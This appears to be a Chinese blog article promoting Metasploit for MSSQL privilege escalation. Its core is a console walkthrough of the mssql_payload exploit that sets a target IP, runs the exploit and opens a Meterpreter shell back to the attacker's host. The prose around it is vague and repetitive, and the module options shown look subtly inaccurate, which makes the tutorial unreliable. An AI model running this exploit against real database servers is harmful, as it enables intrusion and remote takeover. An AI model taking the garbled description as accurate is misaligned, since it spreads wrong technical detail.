MSF神器突破难关,挖掘MSSQL提权之路(msf破解mssql提权)

当对抗网络攻击时,管理员不得不深入了解威胁的数据库,例如MSSQL,以便发现攻击者在发起攻击时访问的数据库;而安全工作者也要求其他组织掌握当前面临威胁的管理数据库。但威胁管理不仅仅是检查数据库;它也包括在应用程序、数据库和系统管理程序中浏览数据,学习其功能,了解可以利用的服务等。

Metasploit是一款开源的强大的框架,可以实现安全性测试、安全扫描和POC挖掘,进而突破攻击者与目标系统之间的安全壁垒。特别是在MSSQL的提权过程中,MSF提供了很多有用的模块,可以让我们更加清楚地了解本地数据库,也可以用于在多实例数据库系统中测试安全性,从而开发出更加强大的攻击手段。

MSF模块不仅能够实现数据库指纹识别,还可以帮助安全工作者检测环境中的攻击技术,通过MSF可以自动化地发现,这有利于发现有漏洞的数据库,此外,还提供实用的模块,可以在不同形式的数据库中检测特定类型的漏洞,从而获取有效的代码。

MSF还支持用户使用ruby脚本,实现攻击手段的自动化,实现数据库访问。以下为一个常见的MSSQL DB提权示例:

# Use exploit/windows/mssql/mssql_payload 
msf exploit(mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.26.11.134 yes The target address
RPC YES yes Use RPC for communication
# 设置RHOST
msf exploit(mssql_payload) > set RHOST 172.26.11.134
RHOST => 172.26.11.134

#设置RPC为yes
msf exploit(mssql_payload) > set RPC yes
RPC => yes

#选择exploit
msf exploit(mssql_payload) > exploit
[+] Sending stage (748736 bytes) to 172.26.11.134
[+] Meterpreter session 1 opened (172.26.11.139:4444 -> 172.26.11.134:1563) at 2020-08-17 07:07:37 -0400
meterpreter >

MSF能够提升攻击结果的定位和准确率,进而提高安全等级。MSF可以快速分析不安全的数据库,以此判断攻击者可以利用的手段,进而采取有效的预防措施,避免受到破坏和数据失窃攻击。因此,安全工作者应该熟悉并利用MSF框架,用来与数据库的提权过程中。


数据运维技术 » MSF神器突破难关,挖掘MSSQL提权之路(msf破解mssql提权)